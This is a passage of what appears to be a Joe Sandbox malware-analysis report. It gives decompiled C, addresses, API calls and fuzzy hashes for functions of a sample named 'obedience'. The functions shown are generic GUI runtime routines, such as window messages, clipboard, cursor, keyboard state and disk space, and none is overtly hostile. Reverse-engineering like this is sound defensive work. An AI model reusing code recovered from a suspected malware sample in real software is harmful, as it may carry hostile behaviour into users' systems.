      				void* _t32;
      				void* _t39;
      				void* _t45;
      				intOrPtr _t47;
      				intOrPtr _t48;
      				void* _t50;
      				void* _t51;
      				intOrPtr* _t65;
      				intOrPtr* _t67;
      				void* _t68;
      
      				_t67 = __edx;
      				_t50 = __eax;
      				_t17 =  *__edx;
      				_t68 = _t17 - 0x84;
      				if(_t68 > 0) {
      					_t19 = _t17 + 0xffffff00 - 9;
      					if(_t19 < 0) {
      						_t21 = E00445098(__eax);
      						if(_t21 != 0) {
      							L28:
      							return _t21;
      						}
      						L27:
      						return E00445BB4(_t50, _t67);
      					}
      					if(_t19 + 0xffffff09 - 0xb < 0) {
      						_t21 = E00448AB0(__eax, _t51, __edx);
      						if(_t21 == 0) {
      							goto L27;
      						}
      						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
      							goto L28;
      						}
      						_t21 = E0044B45C(_t50);
      						if(_t21 == 0) {
      							goto L28;
      						}
      						_push( *((intOrPtr*)(_t67 + 8)));
      						_push( *((intOrPtr*)(_t67 + 4)));
      						_push( *_t67);
      						_t32 = E0044B158(_t50);
      						_push(_t32);
      						L00407550();
      						return _t32;
      					}
      					goto L27;
      				}
      				if(_t68 == 0) {
      					_t21 = E00445BB4(__eax, __edx);
      					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
      						goto L28;
      					}
      					E00407A88( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
      					E0044446C(_t50,  &_v28,  &_v20);
      					_t21 = E00448A1C(_t50, 0,  &_v28, 0);
      					if(_t21 == 0) {
      						goto L28;
      					}
      					 *((intOrPtr*)(_t67 + 0xc)) = 1;
      					return _t21;
      				}
      				_t39 = _t17 - 7;
      				if(_t39 == 0) {
      					_t65 = E0045B78C(__eax);
      					if(_t65 == 0) {
      						goto L27;
      					}
      					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
      					if(_t21 == 0) {
      						goto L28;
      					}
      					goto L27;
      				}
      				_t21 = _t39 - 1;
      				if(_t21 == 0) {
      					if(( *(__eax + 0x54) & 0x00000020) != 0) {
      						goto L28;
      					}
      				} else {
      					if(_t21 == 0x17) {
      						_t45 = E0044B158(__eax);
      						if(_t45 == GetCapture() &&  *0x48ec98 != 0) {
      							_t47 =  *0x48ec98; // 0x0
      							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
      								_t48 =  *0x48ec98; // 0x0
      								E00445AE8(_t48, 0, 0x1f, 0);
      							}
      						}
      					}
      				}
      			}

      0x00448b4a
      0x00448b4c
      0x00448b4e
      0x00448b50
      0x00448b55
      0x00448b74
      0x00448b77
      0x00448c54
      0x00448c5b
      0x00448ca6
      0x00448ca6
      0x00448ca6
      0x00448c97
      0x00000000
      0x00448c9b
      0x00448b85
      0x00448c1e
      0x00448c25
      0x00000000
      0x00000000
      0x00448c2b
      0x00000000
      0x00000000
      0x00448c2f
      0x00448c36
      0x00000000
      0x00000000
      0x00448c3b
      0x00448c3f
      0x00448c42
      0x00448c45
      0x00448c4a
      0x00448c4b
      0x00000000
      0x00448c4b
      0x00000000
      0x00448b8b
      0x00448b57
      0x00448bcd
      0x00448bd6
      0x00000000
      0x00000000
      0x00448be5
      0x00448bf4
      0x00448c01
      0x00448c08
      0x00000000
      0x00000000
      0x00448c0e
      0x00000000
      0x00448c0e
      0x00448b59
      0x00448b5c
      0x00448b97
      0x00448b9b
      0x00000000
      0x00000000
      0x00448ba7
      0x00448baf
      0x00000000
      0x00000000
      0x00000000
      0x00448bb5
      0x00448b5e
      0x00448b5f
      0x00448bbe
      0x00000000
      0x00000000
      0x00448b61
      0x00448b64
      0x00448c61
      0x00448c6f
      0x00448c7a
      0x00448c82
      0x00448c8d
      0x00448c92
      0x00448c92
      0x00448c82
      0x00448c6f
      0x00448b64

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Capture
      • String ID:
      • API String ID: 1145282425-3916222277
      • Opcode ID: ff4cf9bd31829bd0d7e94bc556d91badb813e77aece351ff243c68337a4b7d54
      • Instruction ID: 0606e6933e1171b687d706f98965ba764647296b505368e97cdab373aea4b401
      • Opcode Fuzzy Hash: ff4cf9bd31829bd0d7e94bc556d91badb813e77aece351ff243c68337a4b7d54
      • Instruction Fuzzy Hash: 6D316D316026408BFA20AE3E8CC571E27959B80358F54896FB656CB792DF3CDC49876D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 58%
      			E00426E50(void* __ebx) {
      				char _v260;
      				char _v264;
      				long _t21;
      				void* _t22;
      				intOrPtr _t27;
      				void* _t32;
      
      				_v264 = 0;
      				_push(_t32);
      				_push(0x426eec);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t32 + 0xfffffefc;
      				_t21 = GetLastError();
      				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
      					E00426DFC(_t22);
      				} else {
      					E00404CB0( &_v264, 0x100,  &_v260);
      					E0040CBEC(_v264, 1);
      					E004043D0();
      				}
      				_pop(_t27);
      				 *[fs:eax] = _t27;
      				_push(0x426ef3);
      				return E00404A40( &_v264);
      			}

      0x00426e5c
      0x00426e64
      0x00426e65
      0x00426e6a
      0x00426e6d
      0x00426e75
      0x00426e79
      0x00426ece
      0x00426e9f
      0x00426eb0
      0x00426ec2
      0x00426ec7
      0x00426ec7
      0x00426ed5
      0x00426ed8
      0x00426edb
      0x00426eeb

      APIs
      • GetLastError.KERNEL32(00000000,00426EEC), ref: 00426E70
      • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00426EEC), ref: 00426E96
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ErrorFormatLastMessage
      • String ID: TsA
      • API String ID: 3479602957-2436695117
      • Opcode ID: 78e8d5cd7bda894b9eff5c72b9da0435011197cf9eb709b32c37c1488d542068
      • Instruction ID: f90756e85f1b79bfa2e09082e3251b40f8ea81d22eea3e00e59946f0e7f338d7
      • Opcode Fuzzy Hash: 78e8d5cd7bda894b9eff5c72b9da0435011197cf9eb709b32c37c1488d542068
      • Instruction Fuzzy Hash: 3501FC747043185BE711EB21EC82BDB73ACDB48704F9200BAF704E61C1DAF86D44895D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00429A00(intOrPtr* __eax, void* __ecx, void* __edx) {
      				intOrPtr _v68;
      				intOrPtr _v72;
      				intOrPtr _v76;
      				struct tagENHMETAHEADER _v104;
      				void* __ebp;
      				intOrPtr _t35;
      				intOrPtr* _t37;
      				struct HENHMETAFILE__* _t43;
      				intOrPtr _t44;
      
      				_t37 = __eax;
      				_t43 = GetClipboardData(0xe);
      				if(_t43 == 0) {
      					_t35 =  *0x48f858; // 0x423aa0
      					E00426DC0(_t35);
      				}
      				E004291A0(_t37);
      				_t44 =  *((intOrPtr*)(_t37 + 0x28));
      				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
      				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
      				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
      				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
      				 *((short*)(_t44 + 0x18)) = 0;
      				 *((char*)(_t37 + 0x2c)) = 1;
      				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
      				return  *((intOrPtr*)( *_t37 + 0x10))();
      			}

      0x00429a09
      0x00429a12
      0x00429a16
      0x00429a18
      0x00429a1d
      0x00429a1d
      0x00429a24
      0x00429a29
      0x00429a34
      0x00429a41
      0x00429a4c
      0x00429a55
      0x00429a58
      0x00429a5e
      0x00429a6e
      0x00429a80

      APIs
      • GetClipboardData.USER32 ref: 00429A0D
      • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00429A2F
      • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00429A41
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileMeta$ClipboardCopyDataHeader
      • String ID:
      • API String ID: 1752724394-0
      • Opcode ID: c81729b86197e74a7332bf758a832800c248b3b12199bdf5c57722e70b5557a1
      • Instruction ID: 53e59496765deb3c35bf6ac9cd254ca0d29d78f24490f3aa97cf14144001d615
      • Opcode Fuzzy Hash: c81729b86197e74a7332bf758a832800c248b3b12199bdf5c57722e70b5557a1
      • Instruction Fuzzy Hash: FE112A71B003048FD710DFAAC885A9AB7F8AF49310F50456EE919DB252DA75EC05CB95
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00462D8C() {
      				struct tagPOINT _v12;
      				void* _t5;
      				long _t6;
      
      				 *0x490b8c = GetCurrentThreadId();
      				L5:
      				_t5 =  *0x490b90; // 0x0
      				_t6 = WaitForSingleObject(_t5, 0x64);
      				if(_t6 == 0x102) {
      					if( *0x490b7c != 0 &&  *((intOrPtr*)( *0x490b7c + 0x60)) != 0) {
      						GetCursorPos( &_v12);
      						if(E004431A0( &_v12) == 0) {
      							E00465388( *0x490b7c);
      						}
      					}
      					goto L5;
      				}
      				return _t6;
      			}

      0x00462d9d
      0x00462dcd
      0x00462dcf
      0x00462dd5
      0x00462ddf
      0x00462da7
      0x00462db5
      0x00462dc4
      0x00462dc8
      0x00462dc8
      0x00462dc4
      0x00000000
      0x00462da7
      0x00462de5

      APIs
      • GetCurrentThreadId.KERNEL32 ref: 00462D98
      • GetCursorPos.USER32(?,00000000,00000064), ref: 00462DB5
      • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00462DD5
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CurrentCursorObjectSingleThreadWait
      • String ID:
      • API String ID: 1359611202-0
      • Opcode ID: 5a20e436dc54f8ec2421a931c0b67769df7b3181374180b7d10e969b020d6658
      • Instruction ID: e8d035f7178e7bd3c27614eb6c90bdd891c1d00514965f85aea547a5586f270b
      • Opcode Fuzzy Hash: 5a20e436dc54f8ec2421a931c0b67769df7b3181374180b7d10e969b020d6658
      • Instruction Fuzzy Hash: 91F08971644604AFDB14E7A5DD86B5973DCAF10318F40057BE510962D1FBBDA840C72F
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00445BB4(intOrPtr* __eax, signed int* __edx) {
      				signed int _v12;
      				short _v14;
      				char _v16;
      				signed int _v20;
      				intOrPtr* _v24;
      				char _v280;
      				signed int _t39;
      				signed int _t40;
      				signed int _t46;
      				intOrPtr* _t47;
      				signed int _t50;
      				signed int _t53;
      				intOrPtr _t55;
      				intOrPtr _t56;
      				signed int _t67;
      				signed int _t68;
      				void* _t73;
      				signed int* _t79;
      				intOrPtr _t90;
      				intOrPtr* _t96;
      
      				_t79 = __edx;
      				_t96 = __eax;
      				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
      					L4:
      					_t39 =  *_t79;
      					if(_t39 < 0x100 || _t39 > 0x108) {
      						_t40 =  *_t79;
      						__eflags = _t40 - 0x200;
      						if(_t40 < 0x200) {
      							L30:
      							__eflags = _t40 - 0xb00b;
      							if(_t40 == 0xb00b) {
      								E004444C8(_t96, _t79[1], _t40, _t79[2]);
      							}
      							L32:
      							return  *((intOrPtr*)( *_t96 - 0x14))();
      						}
      						__eflags = _t40 - 0x20a;
      						if(_t40 > 0x20a) {
      							goto L30;
      						}
      						__eflags =  *(_t96 + 0x50) & 0x00000080;
      						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
      							L16:
      							_t46 =  *_t79 - 0x200;
      							__eflags = _t46;
      							if(__eflags == 0) {
      								L21:
      								_t47 =  *0x48f840; // 0x490b7c
      								E004651FC( *_t47, _t79, _t96, __eflags);
      								goto L32;
      							}
      							_t50 = _t46 - 1;
      							__eflags = _t50;
      							if(_t50 == 0) {
      								L22:
      								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
      								if(__eflags != 0) {
      									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
      									goto L32;
      								}
      								return E00403DF8(_t96, __eflags);
      							}
      							_t53 = _t50 - 1;
      							__eflags = _t53;
      							if(_t53 == 0) {
      								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
      								goto L32;
      							}
      							__eflags = _t53 == 1;
      							if(_t53 == 1) {
      								goto L22;
      							}
      							_t55 =  *0x490adc; // 0x2480e48
      							__eflags =  *((char*)(_t55 + 0x20));
      							if( *((char*)(_t55 + 0x20)) == 0) {
      								goto L32;
      							} else {
      								_t56 =  *0x490adc; // 0x2480e48
      								__eflags =  *(_t56 + 0x1c);
      								if( *(_t56 + 0x1c) == 0) {
      									goto L32;
      								}
      								_t90 =  *0x490adc; // 0x2480e48
      								_t25 = _t90 + 0x1c; // 0x0
      								__eflags =  *_t79 -  *_t25;
      								if( *_t79 !=  *_t25) {
      									goto L32;
      								}
      								GetKeyboardState( &_v280);
      								_v20 =  *_t79;
      								_v16 = E0045B6D0( &_v280);
      								_v14 = _t79[1];
      								_v12 = _t79[2];
      								return E00403DF8(_t96, __eflags);
      							}
      							goto L21;
      						}
      						_t67 = _t40 - 0x203;
      						__eflags = _t67;
      						if(_t67 == 0) {
      							L15:
      							 *_t79 =  *_t79 - 2;
      							__eflags =  *_t79;
      							goto L16;
      						}
      						_t68 = _t67 - 3;
      						__eflags = _t68;
      						if(_t68 == 0) {
      							goto L15;
      						}
      						__eflags = _t68 != 3;
      						if(_t68 != 3) {
      							goto L16;
      						}
      						goto L15;
      					}
      					_v24 = E0045B78C(_t96);
      					if(_v24 == 0) {
      						goto L32;
      					}
      					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
      					if(_t73 == 0) {
      						goto L32;
      					}
      				} else {
      					_v24 = E0045B78C(__eax);
      					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
      						goto L4;
      					} else {
      						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
      						if(_t73 == 0) {
      							goto L4;
      						}
      					}
      				}
      				return _t73;
      			}

      0x00445bc0
      0x00445bc2
      0x00445bc8
      0x00445c00
      0x00445c00
      0x00445c07
      0x00445c40
      0x00445c42
      0x00445c47
      0x00445d1f
      0x00445d1f
      0x00445d24
      0x00445d31
      0x00445d31
      0x00445d36
      0x00000000
      0x00445d3c
      0x00445c4d
      0x00445c52
      0x00000000
      0x00000000
      0x00445c58
      0x00445c5c
      0x00445c72
      0x00445c74
      0x00445c74
      0x00445c79
      0x00445c86
      0x00445c88
      0x00445c91
      0x00000000
      0x00445c91
      0x00445c7b
      0x00445c7b
      0x00445c7c
      0x00445c9b
      0x00445c9b
      0x00445c9f
      0x00445cb1
      0x00000000
      0x00445cb1
      0x00000000
      0x00445ca7
      0x00445c7e
      0x00445c7e
      0x00445c7f
      0x00445cb8
      0x00000000
      0x00445cb8
      0x00445c81
      0x00445c82
      0x00000000
      0x00000000
      0x00445cbf
      0x00445cc4
      0x00445cc8
      0x00000000
      0x00445cca
      0x00445cca
      0x00445ccf
      0x00445cd3
      0x00000000
      0x00000000
      0x00445cd7
      0x00445cdd
      0x00445cdd
      0x00445ce0
      0x00000000
      0x00000000
      0x00445ce9
      0x00445cf0
      0x00445cfe
      0x00445d05
      0x00445d0c
      0x00000000
      0x00445d18
      0x00000000
      0x00445cc8
      0x00445c5e
      0x00445c5e
      0x00445c63
      0x00445c6f
      0x00445c6f
      0x00445c6f
      0x00000000
      0x00445c6f
      0x00445c65
      0x00445c65
      0x00445c68
      0x00000000
      0x00000000
      0x00445c6a
      0x00445c6d
      0x00000000
      0x00000000
      0x00000000
      0x00445c6d
      0x00445c17
      0x00445c1e
      0x00000000
      0x00000000
      0x00445c2d
      0x00445c35
      0x00000000
      0x00445c3b
      0x00445bca
      0x00445bd1
      0x00445bd8
      0x00000000
      0x00445be6
      0x00445bf5
      0x00445bfa
      0x00000000
      0x00000000
      0x00445bfa
      0x00445bd8
      0x00445d45

      APIs
      • GetKeyboardState.USER32(?), ref: 00445CE9
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: KeyboardState
      • String ID:
      • API String ID: 1724228437-0
      • Opcode ID: 224b5fd876568c06f262c1a3a3e36d6ee2f5099db0f5db897807260a34a96535
      • Instruction ID: 691cd3f4dde7d2adad73dc57c083418edf7adbc77e6f16ced93021fa9077eaa1
      • Opcode Fuzzy Hash: 224b5fd876568c06f262c1a3a3e36d6ee2f5099db0f5db897807260a34a96535
      • Instruction Fuzzy Hash: FC419170A00A058FEF24DF28C5C87AA77A1AF05304F544567E405DB396CB7CDD45CB9A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E004099C2(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
      				long _v8;
      				long _v12;
      				long _v16;
      				long _v20;
      				intOrPtr _v24;
      				signed int _v28;
      				CHAR* _v32;
      				CHAR* _t28;
      				int _t35;
      				intOrPtr _t40;
      				intOrPtr _t43;
      				intOrPtr* _t48;
      				intOrPtr* _t49;
      				intOrPtr _t53;
      				intOrPtr _t55;
      
      				_t28 = _a4;
      				if(_t28 == 0) {
      					_v32 = 0;
      				} else {
      					_v32 = _t28;
      				}
      				_t35 = GetDiskFreeSpaceA(_v32,  &_v8,  &_v12,  &_v16,  &_v20);
      				_v28 = _v8 * _v12;
      				_v24 = 0;
      				_t53 = _v24;
      				_t40 = E00405938(_v28, _t53, _v16, 0);
      				_t48 = _a8;
      				 *_t48 = _t40;
      				 *((intOrPtr*)(_t48 + 4)) = _t53;
      				_t55 = _v24;
      				_t43 = E00405938(_v28, _t55, _v20, 0);
      				_t49 = _a12;
      				 *_t49 = _t43;
      				 *((intOrPtr*)(_t49 + 4)) = _t55;
      				return _t35;
      			}

      0x004099cb
      0x004099d0
      0x004099d9
      0x004099d2
      0x004099d2
      0x004099d2
      0x004099f0
      0x004099ff
      0x00409a02
      0x00409a0f
      0x00409a12
      0x00409a17
      0x00409a1a
      0x00409a1c
      0x00409a29
      0x00409a2c
      0x00409a31
      0x00409a34
      0x00409a36
      0x00409a3f

      APIs
      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 004099F0
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: DiskFreeSpace
      • String ID:
      • API String ID: 1705453755-0
      • Opcode ID: 4e7f8d245c1b97ba576d3fe2500d88b825555d402c931bb33f8c78baad490c50
      • Instruction ID: 132b7cc182f929aa54bb7edcc5be5463a0d05b3da3c9eddfc1a5f8d23fd47a6a
      • Opcode Fuzzy Hash: 4e7f8d245c1b97ba576d3fe2500d88b825555d402c931bb33f8c78baad490c50
      • Instruction Fuzzy Hash: ED11FAB1E01109EFDB00CF99C881DAFF7F9EF8C314B54816AA519E7351E631AE018BA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 53%
      			E0043AFAC(intOrPtr __eax, intOrPtr* __edx) {
      				intOrPtr _v8;
      				intOrPtr _t12;
      				intOrPtr _t21;
      				intOrPtr _t22;
      				intOrPtr _t25;
      
      				_v8 = __eax;
      				_t22 =  *__edx;
      				_t26 = _t22 - 0x113;
      				if(_t22 != 0x113) {
      					_push( *((intOrPtr*)(__edx + 8)));
      					_push( *((intOrPtr*)(__edx + 4)));
      					_push(_t22);
      					_t12 =  *((intOrPtr*)(_v8 + 0x34));
      					_push(_t12);
      					L00407550();
      					 *((intOrPtr*)(__edx + 0xc)) = _t12;
      					return _t12;
      				}
      				_push(0x43afe6);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t25;
      				E00403DF8(_v8, _t26);
      				_pop(_t21);
      				 *[fs:eax] = _t21;
      				return 0;
      			}

      • Instruction addresses for the C-code listing above: 0x0043afb5, 0x0043afb8, 0x0043afba, 0x0043afc0, 0x0043b004, 0x0043b008, 0x0043b009, 0x0043b00d, 0x0043b010, 0x0043b011, 0x0043b016, 0x00000000, 0x0043b016, 0x0043afc5, 0x0043afca, 0x0043afcd, 0x0043afd7, 0x0043afde, 0x0043afe1, 0x00000000

      APIs
      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0043B011
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: NtdllProc_Window
      • String ID:
      • API String ID: 4255912815-0
      • Opcode ID: 7a9d797a9accea8463c0fd097cc91c4a05ed5930e7a8c91d19bf562b64613883
      • Instruction ID: 306dd0e5afd1966333345a06e70bbe74e0a6bf36249a3bde4be2ae70f37fec03
      • Opcode Fuzzy Hash: 7a9d797a9accea8463c0fd097cc91c4a05ed5930e7a8c91d19bf562b64613883
      • Instruction Fuzzy Hash: 53F0C276608204AFD704DE9ED881C96BBECEB0D32475140B6F908D7640D235AD009B64
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E004273EC(intOrPtr __eax, intOrPtr __edx) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v48;
      				struct _SYSTEM_INFO* _t17;
      				unsigned int _t20;
      				unsigned int _t22;
      				signed int _t31;
      				intOrPtr _t33;
      
      				_v12 = __edx;
      				_v8 = __eax;
      				_t17 =  &_v48;
      				GetSystemInfo(_t17);
      				_t33 = _v8;
      				_t31 = _v12 - 1;
      				if(_t31 >= 0) {
      					if( *((short*)( &_v48 + 0x20)) == 3) {
      						do {
      							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
      							 *(_t33 + _t31 * 4) = _t20;
      							_t31 = _t31 - 1;
      						} while (_t31 >= 0);
      						return _t20;
      					} else {
      						goto L2;
      					}
      					do {
      						L2:
      						asm("bswap eax");
      						_t22 =  *(_t33 + _t31 * 4) >> 8;
      						 *(_t33 + _t31 * 4) = _t22;
      						_t31 = _t31 - 1;
      					} while (_t31 >= 0);
      					return _t22;
